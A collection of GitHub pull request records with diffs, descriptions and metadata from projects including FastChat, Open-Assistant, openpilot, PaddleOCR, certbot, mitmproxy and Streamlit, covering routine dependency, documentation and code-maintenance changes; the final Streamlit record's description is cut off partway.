diff --git a/fastchat/llm_judge/README.md b/fastchat/llm_judge/README.md index 1ab0fdc9d2..b9f06820bf 100644 --- a/fastchat/llm_judge/README.md +++ b/fastchat/llm_judge/README.md @@ -16,7 +16,7 @@ To automate the evaluation process, we prompt strong LLMs like GPT-4 to act as j ``` git clone https://github.com/lm-sys/FastChat.git cd FastChat -pip install -e ".[llm_judge]" +pip install -e ".[model_worker,llm_judge]" ``` ## Review Pre-Generated Model Answers and Judgments diff --git a/fastchat/model/model_falcon.py b/fastchat/model/model_falcon.py index 740f6ef5bb..20afc4f0fb 100644 --- a/fastchat/model/model_falcon.py +++ b/fastchat/model/model_falcon.py @@ -8,8 +8,6 @@ from fastchat.utils import is_partial_stop -transformers.logging.set_verbosity_error() - @torch.inference_mode() def generate_stream_falcon( diff --git a/fastchat/train/llama_flash_attn_monkey_patch.py b/fastchat/train/llama_flash_attn_monkey_patch.py index 89f1913d97..5f9971a32e 100644 --- a/fastchat/train/llama_flash_attn_monkey_patch.py +++ b/fastchat/train/llama_flash_attn_monkey_patch.py @@ -1,26 +1,14 @@ from typing import List, Optional, Tuple -import logging +import warnings import torch from torch import nn -import warnings import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb -try: - from flash_attn.flash_attn_interface import flash_attn_varlen_qkvpacked_func - from flash_attn.bert_padding import unpad_input, pad_input -except Exception: - raise ModuleNotFoundError( - "Please install FlashAttention first, e.g., with pip install flash-attn --no-build-isolation, Learn more at https://github.com/Dao-AILab/flash-attention#installation-and-features" - ) - -try: - from einops import rearrange -except Exception: - raise ModuleNotFoundError( - "Please install einops first, e.g., with pip install einops" - ) +from einops import rearrange +from flash_attn.flash_attn_interface import flash_attn_varlen_qkvpacked_func +from flash_attn.bert_padding import unpad_input, pad_input # ADAPTED from https://github.com/allenai/open-instruct/blob/main/open_instruct/llama_flash_attn_monkey_patch.py @@ -135,7 +123,7 @@ def _prepare_decoder_attention_mask( def replace_llama_attn_with_flash_attn(): cuda_major, cuda_minor = torch.cuda.get_device_capability() if cuda_major < 8: - logging.warning( + warnings.warn( "Flash attention is only supported on A100 or H100 GPU during training due to head dim > 64 backward." "ref: https://github.com/HazyResearch/flash-attention/issues/190#issuecomment-1523359593" ) diff --git a/pyproject.toml b/pyproject.toml index 86fb5cd315..86ff61b85a 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -13,15 +13,15 @@ classifiers = [ "License :: OSI Approved :: Apache Software License", ] dependencies = [ - "einops", "fastapi", "httpx", "markdown2[all]", "nh3", "numpy", - "peft", "prompt_toolkit>=3.0.0", "pydantic<2,>=1", "requests", "rich>=10.0.0", + "fastapi", "httpx", "markdown2[all]", "nh3", "numpy", + "prompt_toolkit>=3.0.0", "pydantic<2,>=1", "requests", "rich>=10.0.0", "shortuuid", "tiktoken", "uvicorn", "wandb" ] [project.optional-dependencies] -model_worker = ["accelerate>=0.21", "torch", "transformers>=4.31.0"] +model_worker = ["accelerate>=0.21", "peft", "sentencepiece", "torch", "transformers>=4.31.0"] webui = ["gradio"] -train = ["flash-attn>=2.0"] +train = ["einops", "flash-attn>=2.0"] llm_judge = ["openai", "anthropic>=0.3", "ray"] dev = ["black==23.3.0", "pylint==2.8.2"]
https://api.github.com/repos/lm-sys/FastChat/pulls/2184
2023-08-08T14:14:03Z
2023-08-08T14:48:25Z
2023-08-08T14:48:25Z
2023-08-08T14:52:27Z
1,095
lm-sys/FastChat
41,244
Point plugin links to prod
diff --git a/docs/docs/plugins/list.md b/docs/docs/plugins/list.md index b304ddf239..e822f9d205 100644 --- a/docs/docs/plugins/list.md +++ b/docs/docs/plugins/list.md @@ -16,7 +16,7 @@ Default Plugins shipped, supported and hosted by Open Assistant. ### Web Retriever - url: - https://inference.dev.open-assistant.io/plugins/web_retriever/ai-plugin.json + https://inference.prod.open-assistant.io/plugins/web_retriever/ai-plugin.json - info: https://github.com/LAION-AI/Open-Assistant/tree/main/inference/server/oasst_inference_server/plugins/web_retriever @@ -46,7 +46,7 @@ What is the capital of (France)? ### Super Aligned GAGLETO - url: - https://inference.dev.open-assistant.io/plugins/gale_pleaser/ai-plugin.json + https://inference.prod.open-assistant.io/plugins/gale_pleaser/ai-plugin.json - info: https://github.com/LAION-AI/Open-Assistant/tree/main/inference/server/oasst_inference_server/plugins/gale_pleaser
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3386
2023-06-11T15:12:51Z
2023-06-12T04:55:33Z
2023-06-12T04:55:33Z
2023-06-12T04:55:34Z
262
LAION-AI/Open-Assistant
37,248
don't reflash agnos update if already flashed
diff --git a/selfdrive/hardware/tici/agnos.py b/selfdrive/hardware/tici/agnos.py index 24e544f23b8539..c0de8d4765913d 100755 --- a/selfdrive/hardware/tici/agnos.py +++ b/selfdrive/hardware/tici/agnos.py @@ -80,8 +80,15 @@ def flash_partition(cloudlog, spinner, target_slot, partition): cloudlog.info(f"Downloading and writing {partition['name']}") downloader = StreamingDecompressor(partition['url']) - with open(f"/dev/disk/by-partlabel/{partition['name']}{target_slot}", 'wb') as out: + with open(f"/dev/disk/by-partlabel/{partition['name']}{target_slot}", 'wb+') as out: partition_size = partition['size'] + + # Check if partition is already flashed + out.seek(partition_size) + if out.read(64) == partition['hash_raw'].lower().encode(): + cloudlog.info(f"Already flashed {partition['name']}") + return + # Clear hash before flashing out.seek(partition_size) out.write(b"\x00" * 64)
https://api.github.com/repos/commaai/openpilot/pulls/19944
2021-01-27T23:56:18Z
2021-01-28T01:10:55Z
2021-01-28T01:10:55Z
2021-01-28T01:10:56Z
274
commaai/openpilot
9,349
[cherry-pick #1920]
diff --git a/deploy/cpp_infer/readme.md b/deploy/cpp_infer/readme.md index b563ecf48c..f81d9c75e9 100644 --- a/deploy/cpp_infer/readme.md +++ b/deploy/cpp_infer/readme.md @@ -1,6 +1,8 @@ # 服务器端C++预测 -本教程将介绍在服务器端部署PaddleOCR超轻量中文检测、识别模型的详细步骤。 +本章节介绍PaddleOCR 模型的的C++部署方法,与之对应的python预测部署方式参考[文档](../../doc/doc_ch/inference.md)。 +C++在性能计算上优于python,因此,在大多数CPU、GPU部署场景,多采用C++的部署方式,本节将介绍如何在Linux\Windows (CPU\GPU)环境下配置C++环境并完成 +PaddleOCR模型部署。 ## 1. 准备环境 diff --git a/deploy/cpp_infer/readme_en.md b/deploy/cpp_infer/readme_en.md index 41c764bc18..8a0bd62ecc 100644 --- a/deploy/cpp_infer/readme_en.md +++ b/deploy/cpp_infer/readme_en.md @@ -1,7 +1,9 @@ # Server-side C++ inference - -In this tutorial, we will introduce the detailed steps of deploying PaddleOCR ultra-lightweight Chinese detection and recognition models on the server side. +This chapter introduces the C++ deployment method of the PaddleOCR model, and the corresponding python predictive deployment method refers to [document](../../doc/doc_ch/inference.md). +C++ is better than python in terms of performance calculation. Therefore, in most CPU and GPU deployment scenarios, C++ deployment is mostly used. +This section will introduce how to configure the C++ environment and complete it in the Linux\Windows (CPU\GPU) environment +PaddleOCR model deployment. ## 1. Prepare the environment diff --git a/doc/doc_ch/inference.md b/doc/doc_ch/inference.md index f0a8983c4b..7968b355ea 100755 --- a/doc/doc_ch/inference.md +++ b/doc/doc_ch/inference.md @@ -2,10 +2,11 @@ # 基于Python预测引擎推理 inference 模型(`paddle.jit.save`保存的模型) -一般是模型训练完成后保存的固化模型,多用于预测部署。训练过程中保存的模型是checkpoints模型,保存的是模型的参数,多用于恢复训练等。 -与checkpoints模型相比,inference 模型会额外保存模型的结构信息,在预测部署、加速推理上性能优越,灵活方便,适合与实际系统集成。 +一般是模型训练,把模型结构和模型参数保存在文件中的固化模型,多用于预测部署场景。 +训练过程中保存的模型是checkpoints模型,保存的只有模型的参数,多用于恢复训练等。 +与checkpoints模型相比,inference 模型会额外保存模型的结构信息,在预测部署、加速推理上性能优越,灵活方便,适合于实际系统集成。 -接下来首先介绍如何将训练的模型转换成inference模型,然后将依次介绍文本检测、文本角度分类器、文本识别以及三者串联基于预测引擎推理。 +接下来首先介绍如何将训练的模型转换成inference模型,然后将依次介绍文本检测、文本角度分类器、文本识别以及三者串联在CPU、GPU上的预测方法。 - [一、训练模型转inference模型](#训练模型转inference模型) diff --git a/doc/doc_ch/installation.md b/doc/doc_ch/installation.md index fce151eb9f..7e7523b999 100644 --- a/doc/doc_ch/installation.md +++ b/doc/doc_ch/installation.md @@ -30,7 +30,7 @@ sudo nvidia-docker run --name ppocr -v $PWD:/paddle --shm-size=64G --network=hos sudo docker container exec -it ppocr /bin/bash ``` -**2. 安装PaddlePaddle Fluid v2.0** +**2. 安装PaddlePaddle 2.0** ``` pip3 install --upgrade pip diff --git a/doc/doc_en/inference_en.md b/doc/doc_en/inference_en.md index 6b745619c9..aa3e0536cb 100755 --- a/doc/doc_en/inference_en.md +++ b/doc/doc_en/inference_en.md @@ -5,7 +5,8 @@ The inference model (the model saved by `paddle.jit.save`) is generally a solidi The model saved during the training process is the checkpoints model, which saves the parameters of the model and is mostly used to resume training. -Compared with the checkpoints model, the inference model will additionally save the structural information of the model. It has superior performance in predicting in deployment and accelerating inferencing, is flexible and convenient, and is suitable for integration with actual systems. For more details, please refer to the document [Classification Framework](https://github.com/PaddlePaddle/PaddleClas/blob/master/docs/zh_CN/extension/paddle_inference.md). +Compared with the checkpoints model, the inference model will additionally save the structural information of the model. 
Therefore, it is easier to deploy because the model structure and model parameters are already solidified in the inference model file, and is suitable for integration with actual systems. +For more details, please refer to the document [Classification Framework](https://github.com/PaddlePaddle/PaddleClas/blob/release%2F2.0/docs/zh_CN/extension/paddle_mobile_inference.md). Next, we first introduce how to convert a trained model into an inference model, and then we will introduce text detection, text recognition, angle class, and the concatenation of them based on inference model. diff --git a/doc/doc_en/installation_en.md b/doc/doc_en/installation_en.md index 35c1881d12..dec384b2f2 100644 --- a/doc/doc_en/installation_en.md +++ b/doc/doc_en/installation_en.md @@ -33,7 +33,7 @@ You can also visit [DockerHub](https://hub.docker.com/r/paddlepaddle/paddle/tags sudo docker container exec -it ppocr /bin/bash ``` -**2. Install PaddlePaddle Fluid v2.0** +**2. Install PaddlePaddle 2.0** ``` pip3 install --upgrade pip diff --git a/tools/infer/utility.py b/tools/infer/utility.py index 4171a29bdd..a4a91efdd2 100755 --- a/tools/infer/utility.py +++ b/tools/infer/utility.py @@ -47,6 +47,7 @@ def str2bool(v): parser.add_argument("--det_db_box_thresh", type=float, default=0.5) parser.add_argument("--det_db_unclip_ratio", type=float, default=1.6) parser.add_argument("--max_batch_size", type=int, default=10) + parser.add_argument("--use_dilation", type=bool, default=False) # EAST parmas parser.add_argument("--det_east_score_thresh", type=float, default=0.8) parser.add_argument("--det_east_cover_thresh", type=float, default=0.1) @@ -123,6 +124,8 @@ def create_predictor(args, mode, logger): # cache 10 different shapes for mkldnn to avoid memory leak config.set_mkldnn_cache_capacity(10) config.enable_mkldnn() + # TODO LDOUBLEV: fix mkldnn bug when bach_size > 1 + #config.set_mkldnn_op({'conv2d', 'depthwise_conv2d', 'pool2d', 'batch_norm'}) args.rec_batch_num = 1 # config.enable_memory_optim() diff --git a/tools/program.py b/tools/program.py index 6277d74758..ae6491768c 100755 --- a/tools/program.py +++ b/tools/program.py @@ -394,6 +394,7 @@ def preprocess(is_train=False): logger = get_logger(name='root', log_file=log_file) if config['Global']['use_visualdl']: from visualdl import LogWriter + save_model_dir = config['Global']['save_model_dir'] vdl_writer_path = '{}/vdl/'.format(save_model_dir) os.makedirs(vdl_writer_path, exist_ok=True) vdl_writer = LogWriter(logdir=vdl_writer_path) diff --git a/train.sh b/train.sh index 8fe861a3d7..4225470cb9 100644 --- a/train.sh +++ b/train.sh @@ -1,2 +1,2 @@ # recommended paddle.__version__ == 2.0.0 -python3 -m paddle.distributed.launch --gpus '0,1,2,3,4,5,6,7' tools/train.py -c configs/rec/rec_mv3_none_bilstm_ctc.yml +python3 -m paddle.distributed.launch --log_dir=./debug/ --gpus '0,1,2,3,4,5,6,7' tools/train.py -c configs/rec/rec_mv3_none_bilstm_ctc.yml
Optimize deployment and installation related documentation.
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/2024
2021-02-18T11:26:01Z
2021-02-18T11:26:39Z
2021-02-18T11:26:39Z
2021-02-18T11:26:39Z
2,127
PaddlePaddle/PaddleOCR
42,120
Update Armstrong_number.py
diff --git a/Armstrong_number.py b/Armstrong_number.py index 0c680c7def..be923c0bf3 100644 --- a/Armstrong_number.py +++ b/Armstrong_number.py @@ -1,18 +1,21 @@ def is_armstrong_number(number): - sum = 0 + total = 0 # find the sum of the cube of each digit temp = number while temp > 0: - digit = temp % 10 - sum += digit ** 3 - temp //= 10 + digit = temp % 10 + total += digit ** 3 + temp //= 10 - # display the result - if number == sum: - print(number,"is an Armstrong number") + # return the result + if number == total: + return True else: - print(number,"is not an Armstrong number") + return False -number = int(input("Enter the number : ")) -is_armstrong_number(number) +number = int(input("Enter the number: ")) +if is_armstrong_number(number): + print(number,"is an Armstrong number") +else: + print(number,"is not an Armstrong number")
The variable name `sum` is a built-in function name in Python, and it is not good practice to use built-in function names as variable names; a different name such as `total` or `sum_of_cubes` is recommended. The code was also using the `print` function to display the result. It is generally better to return the result instead of printing it, so that the function can be used in other parts of the code.
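A short sketch of why returning a boolean helps reuse, using the same cube-of-digits logic as the diff above; the range scanned below is just an example.

```python
def is_armstrong_number(number):
    total = 0
    temp = number
    while temp > 0:
        digit = temp % 10
        total += digit ** 3
        temp //= 10
    return number == total

# Because the function returns a bool, it composes with other code without printing
armstrong_numbers = [n for n in range(1, 1000) if is_armstrong_number(n)]
print(armstrong_numbers)  # [1, 153, 370, 371, 407]
```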
https://api.github.com/repos/geekcomputers/Python/pulls/1862
2023-03-17T09:25:26Z
2023-03-18T09:57:27Z
2023-03-18T09:57:27Z
2023-03-18T09:57:27Z
283
geekcomputers/Python
31,135
Conditionally depend on imgconverter for newer versions of Sphinx
diff --git a/CHANGELOG.md b/CHANGELOG.md index 4b10a580512..1b8032fa1d2 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -19,6 +19,7 @@ Certbot adheres to [Semantic Versioning](http://semver.org/). ### Fixed * Update code and dependencies to clean up Resource and Deprecation Warnings. +* Only depend on imgconverter extension for Sphinx >= 1.6 Despite us having broken lockstep, we are continuing to release new versions of all Certbot components during releases for the time being, however, the only diff --git a/docs/conf.py b/docs/conf.py index 2e6c5a9b71d..c72d1c1cff1 100644 --- a/docs/conf.py +++ b/docs/conf.py @@ -17,6 +17,8 @@ import re import sys +import sphinx + here = os.path.abspath(os.path.dirname(__file__)) @@ -33,14 +35,13 @@ # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. -needs_sphinx = '1.0' +needs_sphinx = '1.2' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', - 'sphinx.ext.imgconverter', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', @@ -48,6 +49,9 @@ 'repoze.sphinx.autointerface', ] +if sphinx.version_info >= (1, 6): + extensions.append('sphinx.ext.imgconverter') + autodoc_member_order = 'bysource' autodoc_default_flags = ['show-inheritance', 'private-members'] diff --git a/setup.py b/setup.py index f8f5feadc40..90e68680dcb 100644 --- a/setup.py +++ b/setup.py @@ -68,9 +68,10 @@ def read_file(filename, encoding='utf8'): ] docs_extras = [ + # If you have Sphinx<1.5.1, you need docutils<0.13.1 + # https://github.com/sphinx-doc/sphinx/issues/3212 'repoze.sphinx.autointerface', - # sphinx.ext.imgconverter - 'Sphinx >=1.6', + 'Sphinx>=1.2', # Annotation support 'sphinx_rtd_theme', ] diff --git a/tools/dev_constraints.txt b/tools/dev_constraints.txt index 65182bcded5..778012d31d3 100644 --- a/tools/dev_constraints.txt +++ b/tools/dev_constraints.txt @@ -14,7 +14,7 @@ coverage==4.4.2 decorator==4.1.2 dns-lexicon==2.7.14 dnspython==1.15.0 -docutils==0.14 +docutils==0.12 execnet==1.5.0 future==0.16.0 futures==3.1.1
Fixes #6343. Be sure to edit the `master` section of `CHANGELOG.md` with a line describing this PR before it gets merged.
https://api.github.com/repos/certbot/certbot/pulls/6536
2018-11-28T18:06:32Z
2018-12-04T18:56:17Z
2018-12-04T18:56:16Z
2018-12-04T18:56:21Z
731
certbot/certbot
447
Revert "Bump the release version in pyproject.toml"
diff --git a/pyproject.toml b/pyproject.toml index 01f2984d7b..fbafd9bc9a 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -3,7 +3,7 @@ requires = ["setuptools", "wheel"] [project] name = "gpt-engineer" -version = "0.0.10" +version = "0.0.9" description = "Specify what you want it to build, the AI asks for clarification, and then builds it." readme = "README.md" requires-python = ">=3.8, <4.0"
Reverts AntonOsika/gpt-engineer#666
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/672
2023-09-04T07:00:55Z
2023-09-04T07:01:09Z
2023-09-04T07:01:09Z
2023-12-04T12:53:56Z
141
gpt-engineer-org/gpt-engineer
33,163
Bump the github-actions group with 2 updates
diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index fe827c0947..e3767ed6f2 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -39,7 +39,7 @@ jobs: - uses: install-pinned/autoflake@46b4898323be58db319656fe2758f3fd5ddfee32 - run: autoflake --in-place --remove-all-unused-imports --exclude mitmproxy/contrib -r . - - uses: install-pinned/black@97252d99da3d792eedae55ff50e64df8bd162447 + - uses: install-pinned/black@ba55a508f931f1ee71ee049edba55c3382567656 - run: black . - name: Run prettier diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7397cb20d7..e9b8dd2ec4 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -210,7 +210,7 @@ jobs: name: binaries.linux path: release/dist - uses: docker/setup-qemu-action@2b82ce82d56a2a04d2637cd93a637ae1b359c0a7 # v2.2.0 - - uses: docker/setup-buildx-action@4c0219f9ac95b02789c1075625400b2acbff50b1 # v1.6.0 + - uses: docker/setup-buildx-action@885d1462b80bc1c1c7f0b00334ad271f09369c55 # v1.6.0 - run: python release/build-and-deploy-docker.py deploy:
Bumps the github-actions group with 2 updates: [install-pinned/black](https://github.com/install-pinned/black) and [docker/setup-buildx-action](https://github.com/docker/setup-buildx-action). Updates `install-pinned/black` from 97252d99da3d792eedae55ff50e64df8bd162447 to ba55a508f931f1ee71ee049edba55c3382567656 <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/install-pinned/black/commit/ba55a508f931f1ee71ee049edba55c3382567656"><code>ba55a50</code></a> update README.md (black 23.7.0)</li> <li><a href="https://github.com/install-pinned/black/commit/4a48eceba98e9cfbac87f256206539800464021f"><code>4a48ece</code></a> update pins (black 23.7.0)</li> <li>See full diff in <a href="https://github.com/install-pinned/black/compare/97252d99da3d792eedae55ff50e64df8bd162447...ba55a508f931f1ee71ee049edba55c3382567656">compare view</a></li> </ul> </details> <br /> Updates `docker/setup-buildx-action` from 2.9.1 to 2.10.0 <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/docker/setup-buildx-action/releases">docker/setup-buildx-action's releases</a>.</em></p> <blockquote> <h2>v2.10.0</h2> <h2>What's Changed</h2> <ul> <li>Bump <code>@​docker/actions-toolkit</code> from 0.7.1 to 0.10.0 by <a href="https://github.com/crazy-max"><code>@​crazy-max</code></a> in <a href="https://redirect.github.com/docker/setup-buildx-action/pull/258">docker/setup-buildx-action#258</a></li> <li>Bump word-wrap from 1.2.3 to 1.2.5 in <a href="https://redirect.github.com/docker/setup-buildx-action/pull/253">docker/setup-buildx-action#253</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/docker/setup-buildx-action/compare/v2.9.1...v2.10.0">https://github.com/docker/setup-buildx-action/compare/v2.9.1...v2.10.0</a></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/docker/setup-buildx-action/commit/885d1462b80bc1c1c7f0b00334ad271f09369c55"><code>885d146</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/258">#258</a> from crazy-max/update-toolkit</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/e5fad018d00dc71b199f641deb34adcd2dd1362e"><code>e5fad01</code></a> ci: check lab releases</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/45161fd92a2d576283f9acd907a14d63ac064fb5"><code>45161fd</code></a> update generated content</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/a4d51f53dd5c70934ae72739cde724f85358d34b"><code>a4d51f5</code></a> bump <code>@​docker/actions-toolkit</code> from 0.7.1 to 0.10.0</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/93b8ecaa2c1900a3605b90629b56d2208bf1d41f"><code>93b8eca</code></a> ci: docker-ce packages are now installed on GitHub Runners</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/7703e82fbced3d0c9eec08dff4429c023a5fd9a9"><code>7703e82</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/253">#253</a> from docker/dependabot/npm_and_yarn/word-wrap-1.2.5</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/0005881963856e76b0c8555665b82bf67160c9ef"><code>0005881</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/254">#254</a> from crazy-max/rm-codeowners</li> <li><a 
href="https://github.com/docker/setup-buildx-action/commit/b699069f49d62b69f99848b5351b7cc2c94b85ba"><code>b699069</code></a> chore: remove CODEOWNERS</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/9bfc5497b8a1d0ba2d3cedb28e3812a2956b5f42"><code>9bfc549</code></a> Bump word-wrap from 1.2.3 to 1.2.5</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/b92d4d8769414806de390e017471f09793283cfc"><code>b92d4d8</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/252">#252</a> from crazy-max/dependabot-update</li> <li>Additional commits viewable in <a href="https://github.com/docker/setup-buildx-action/compare/4c0219f9ac95b02789c1075625400b2acbff50b1...885d1462b80bc1c1c7f0b00334ad271f09369c55">compare view</a></li> </ul> </details> <br /> Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore <dependency name> major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself) - `@dependabot ignore <dependency name> minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself) - `@dependabot ignore <dependency name>` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself) - `@dependabot unignore <dependency name>` will remove all of the ignore conditions of the specified dependency - `@dependabot unignore <dependency name> <ignore condition>` will remove the ignore condition of the specified dependency and ignore conditions </details>
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/6349
2023-09-01T23:00:06Z
2023-09-05T13:32:54Z
2023-09-05T13:32:54Z
2023-09-05T13:33:04Z
443
mitmproxy/mitmproxy
28,167
Expire session storage cache on an async timer
diff --git a/lib/streamlit/runtime/caching/cache_resource_api.py b/lib/streamlit/runtime/caching/cache_resource_api.py index 6969a56b43ef..e6280ee5ae8f 100644 --- a/lib/streamlit/runtime/caching/cache_resource_api.py +++ b/lib/streamlit/runtime/caching/cache_resource_api.py @@ -22,7 +22,6 @@ from datetime import timedelta from typing import Any, Callable, TypeVar, cast, overload -from cachetools import TTLCache from typing_extensions import TypeAlias import streamlit as st @@ -48,6 +47,7 @@ from streamlit.runtime.metrics_util import gather_metrics from streamlit.runtime.scriptrunner.script_run_context import get_script_run_ctx from streamlit.runtime.stats import CacheStat, CacheStatsProvider, group_stats +from streamlit.util import TimedCleanupCache from streamlit.vendor.pympler.asizeof import asizeof _LOGGER = get_logger(__name__) @@ -473,7 +473,7 @@ def __init__( super().__init__() self.key = key self.display_name = display_name - self._mem_cache: TTLCache[str, MultiCacheResults] = TTLCache( + self._mem_cache: TimedCleanupCache[str, MultiCacheResults] = TimedCleanupCache( maxsize=max_entries, ttl=ttl_seconds, timer=cache_utils.TTLCACHE_TIMER ) self._mem_cache_lock = threading.Lock() diff --git a/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py b/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py index bb0d19e78294..dc750c394676 100644 --- a/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py +++ b/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py @@ -16,8 +16,6 @@ import math import threading -from cachetools import TTLCache - from streamlit.logger import get_logger from streamlit.runtime.caching import cache_utils from streamlit.runtime.caching.storage.cache_storage_protocol import ( @@ -26,6 +24,7 @@ CacheStorageKeyNotFoundError, ) from streamlit.runtime.stats import CacheStat +from streamlit.util import TimedCleanupCache _LOGGER = get_logger(__name__) @@ -62,7 +61,7 @@ def __init__(self, persist_storage: CacheStorage, context: CacheStorageContext): self.function_display_name = context.function_display_name self._ttl_seconds = context.ttl_seconds self._max_entries = context.max_entries - self._mem_cache: TTLCache[str, bytes] = TTLCache( + self._mem_cache: TimedCleanupCache[str, bytes] = TimedCleanupCache( maxsize=self.max_entries, ttl=self.ttl_seconds, timer=cache_utils.TTLCACHE_TIMER, diff --git a/lib/streamlit/runtime/memory_session_storage.py b/lib/streamlit/runtime/memory_session_storage.py index c9ee7511bf68..5e7088d6eeda 100644 --- a/lib/streamlit/runtime/memory_session_storage.py +++ b/lib/streamlit/runtime/memory_session_storage.py @@ -12,11 +12,11 @@ # See the License for the specific language governing permissions and # limitations under the License. -from typing import List, MutableMapping, Optional -from cachetools import TTLCache +from typing import List, MutableMapping, Optional from streamlit.runtime.session_manager import SessionInfo, SessionStorage +from streamlit.util import TimedCleanupCache class MemorySessionStorage(SessionStorage): @@ -55,7 +55,7 @@ def __init__( inaccessible and will be removed eventually. 
""" - self._cache: MutableMapping[str, SessionInfo] = TTLCache( + self._cache: MutableMapping[str, SessionInfo] = TimedCleanupCache( maxsize=maxsize, ttl=ttl_seconds ) diff --git a/lib/streamlit/util.py b/lib/streamlit/util.py index 4b4f3383309d..2f4bc126cdc4 100644 --- a/lib/streamlit/util.py +++ b/lib/streamlit/util.py @@ -16,14 +16,27 @@ from __future__ import annotations +import asyncio import dataclasses import functools import hashlib import os import subprocess import sys -from typing import Any, Dict, Iterable, List, Mapping, Set, TypeVar, Union +from typing import ( + Any, + Dict, + Generic, + Iterable, + List, + Mapping, + Optional, + Set, + TypeVar, + Union, +) +from cachetools import TTLCache from typing_extensions import Final from streamlit import env_util @@ -203,3 +216,37 @@ def extract_key_query_params( for item in sublist ] ) + + +K = TypeVar("K") +V = TypeVar("V") + + +class TimedCleanupCache(TTLCache, Generic[K, V]): + """A TTLCache that asynchronously expires its entries.""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._task: Optional[asyncio.Task[Any]] = None + + def __setitem__(self, key: K, value: V) -> None: + # Set an expiration task to run periodically + # Can't be created in init because that only runs once and + # the event loop might not exist yet. + if self._task is None: + try: + self._task = asyncio.create_task(expire_cache(self)) + except RuntimeError: + # Just continue if the event loop isn't started yet. + pass + super().__setitem__(key, value) + + def __del__(self): + if self._task is not None: + self._task.cancel() + + +async def expire_cache(cache: TTLCache) -> None: + while True: + await asyncio.sleep(30) + cache.expire() diff --git a/lib/tests/streamlit/util_test.py b/lib/tests/streamlit/util_test.py index fd26c6fd0182..628ea3893149 100644 --- a/lib/tests/streamlit/util_test.py +++ b/lib/tests/streamlit/util_test.py @@ -12,6 +12,8 @@ # See the License for the specific language governing permissions and # limitations under the License. +import asyncio +import gc import random import unittest from typing import Dict, List, Set @@ -185,3 +187,26 @@ def test_calc_md5_can_handle_bytes_and_strings(self): util.calc_md5("eventually bytes"), util.calc_md5("eventually bytes".encode("utf-8")), ) + + def test_timed_cleanup_cache_gc(self): + """Test that the TimedCleanupCache does not leave behind tasks when + the cache is not externally reachable""" + loop = asyncio.new_event_loop() + asyncio.set_event_loop(loop) + + async def create_cache(): + cache = util.TimedCleanupCache(maxsize=2, ttl=10) + cache["foo"] = "bar" + + # expire_cache and create_cache + assert len(asyncio.all_tasks()) > 1 + + asyncio.run(create_cache()) + + gc.collect() + + async def check(): + # Only has this function running + assert len(asyncio.all_tasks()) == 1 + + asyncio.run(check())
## Describe your changes To reduce the tendency of expired sessions to stick around for a long time for lower traffic apps, and potentially consume lots of memory, add an async task to periodically expire the TTLCache used in the default session storage implementation. ## GitHub Issue Link (if applicable) ## Testing Plan Was manually tested, and a unit test for tasks not sticking around was included. --- **Contribution License Agreement** By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
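For illustration, a minimal standalone sketch of the periodic-expiry pattern this PR adds — plain `cachetools` plus an asyncio sweeper task; the names and numbers here are illustrative, not Streamlit's actual API beyond what the diff shows:

```python
import asyncio
from cachetools import TTLCache

async def sweep(cache: TTLCache, interval: float) -> None:
    # Periodically evict entries whose TTL has elapsed, instead of waiting
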